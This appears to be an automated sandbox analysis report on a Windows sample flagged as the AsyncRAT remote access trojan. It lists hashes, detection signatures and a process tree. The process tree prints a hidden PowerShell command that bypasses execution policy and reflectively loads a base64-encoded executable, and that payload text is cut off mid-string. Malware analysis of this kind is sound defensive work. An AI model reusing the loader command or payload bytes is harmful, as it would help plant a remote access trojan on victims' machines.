Edit tour
Windows
Analysis Report
bad.txt
Overview
General Information
| Sample name: | bad.txt |
| Analysis ID: | 1578479 |
| MD5: | d02c187310eadf963c0d57378b8595fc |
| SHA1: | c8c42bd1d0eee9c27a7718b478492ca5835b04dd |
| SHA256: | e312dfddeb5ba9867345de8a4926b449854fb3ea90355c0f4150bbcb49593852 |
| Infos: |   |
 | |
Detection
AsyncRAT
| Score: | 96 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected AsyncRAT
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Injects a PE file into a foreign processes
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Base64 MZ Header In CommandLine
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a global mouse hook
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64_ra
notepad.exe (PID: 6984 cmdline: "C:\Window s\system32 \NOTEPAD.E XE" C:\Use rs\user\De sktop\bad. txt MD5: 27F71B12CB585541885A31BE22F61C83)
- svchost.exe (PID: 7140 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
cmd.exe (PID: 1364 cmdline: "C:\Window s\System32 \cmd.exe" /C "C:\Use rs\user\De sktop\bad. cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4896 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 5508 cmdline: "powershel l.exe" -Ex ecutionPol icy Bypass -NoProfil e -WindowS tyle Hidde n -NoExit -command [ System.Ref lection.As sembly]::L oad([Syste m.Convert] ::FromBase 64String(' TVqQAAMAAA AEAAAA//8A ALgAAAAAAA AAQAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA gAAAAA4fug 4AtAnNIbgB TM0hVGhpcy Bwcm9ncmFt IGNhbm5vdC BiZSBydW4g aW4gRE9TIG 1vZGUuDQ0K JAAAAAAAAA BQRQAAZIYC APZXmuwAAA AAAAAAAPAA IgALAjAAAD gAAAACAAAA AAAAAAAAAA AgAAAAAABA AQAAAAAgAA AAAgAABAAA AAAAAAAGAA AAAAAAAACA AAAAAgAAXD oBAAIAYIUA AEAAAAAAAA BAAAAAAAAA AAAQAAAAAA AAIAAAAAAA AAAAAAAQAA AAAAAAAAAA AAAAAAAAAA AAAABgAAAQ AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAFFYA ABwAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAgAABIAA AAAAAAAAAA AAAudGV4dA AAAFA3AAAA IAAAADgAAA ACAAAAAAAA AAAAAAAAAA AgAABgLnJz cmMAAAAQAA AAAGAAAAAC AAAAOgAAAA AAAAAAAAAA AAAAQAAAQA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AABIAAAAAg AFAMQpAACY KwAAAQAAAB AAAAZcVQAA uAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAe AigXAAAKKq 5+AQAABC0e cgEAAHDQAg AAAigYAAAK bxkAAApzGg AACoABAAAE fgEAAAQqGn 4CAAAEKh4C gAIAAAQqGn 4DAAAEKh4C KBsAAAoqVn MGAAAGKBwA AAp0AwAAAo ADAAAEKjIo HQAACgJvHg AACiqODwAo CQAABg8BKA oAAAbQAQAA GygYAAAKKB 8AAAqlAQAA GyoAAAAbMA sA5AIAAAEA ABEWCjjVAg AAFgsSAv4V EQAAAhID/h UQAAACEgLQ EQAAAigYAA AKKCAAAAoo IQAACn0iAA AEfg0AAAQC fiIAAAp+Iw AACn4jAAAK FiAEAAAIfi MAAAoUEgIS A28+AAAGLQ ZzJAAACnoD HzwoJQAACh MEAxEEHzRY KCUAAAoTBS CzAAAAjTMA AAETBhEGFi ACAAEAnigm AAAKGjMafg gAAAQJex8A AAQRBm8qAA AGLSBzJAAA Cnp+BwAABA l7HwAABBEG byYAAAYtBn MkAAAKehEG HymUEwcWEw h+CwAABAl7 HgAABBEHHl gSCBoSAW82 AAAGLQZzJA AACnoRBREI Mxp+DAAABA l7HgAABBEI bzoAAAYsBn MkAAAKegMR BB9QWCglAA AKEwkDEQQf VFgoJQAACh MKFhMLfgkA AAQJex4AAA QRBREJIAAw AAAfQG8uAA AGEwwRDC0G cyQAAAp6fg oAAAQJex4A AAQRDAMRCh IBbzIAAAYt BnMkAAAKeh EEIPgAAABY Ew0DEQQcWC gnAAAKEw4W ExErdQMRDR 8MWCglAAAK ExIDEQ0fEF goJQAAChMT AxENHxRYKC UAAAoTFBET LD0RE400AA ABExUDERQR FRYRFY5pKC gAAAp+CgAA BAl7HgAABB EMERJYERUR FY5pEgFvMg AABi0GcyQA AAp6EQ0fKF gTDRERF1gT EREREQ4yhR EMKCkAAAoT D34KAAAECX seAAAEEQce WBEPGhIBbz IAAAYtBnMk AAAKegMRBB 8oWCglAAAK ExARCywEEQ UTDBEGHywR DBEQWJ4oJg AAChozGn4G AAAECXsfAA AEEQZvIgAA Bi0gcyQAAA p6fgUAAAQJ ex8AAAQRBm 8eAAAGLQZz JAAACnp+BA AABAl7HwAA BG8aAAAGFT MGcyQAAAp6 BCwLCXseAA AEKBYAAAbe IyYJeyAAAA QoKgAACigr AAAKbywAAA reAAYXWAoG Gz8k/f//Kk EcAAAAAAAA NAAAAIwCAA DAAgAAGAAA ABYAAAETMA cAWAAAAAIA ABEgAAwAAC gtAAAKGo0W AAABJRZzLg AACqIlF34O AAAEoiUYF4 wzAAABoiUZ F40WAAABJR YCoqIK0DsA AAEoGAAACn 4PAAAEKC8A AAoWjDMAAA EGbzAAAAoq EzAGAEgAAA ADAAARAm8x AAAKF2ONNA AAAQoWCysp BgcCBxdibz IAAAooDwAA BhpiAgcXYh dYbzIAAAoo DwAABljSnA cXWAsHAm8x AAAKF2MyzA YqOgIlHzoy BB83KwIfMF kqABMwAwCB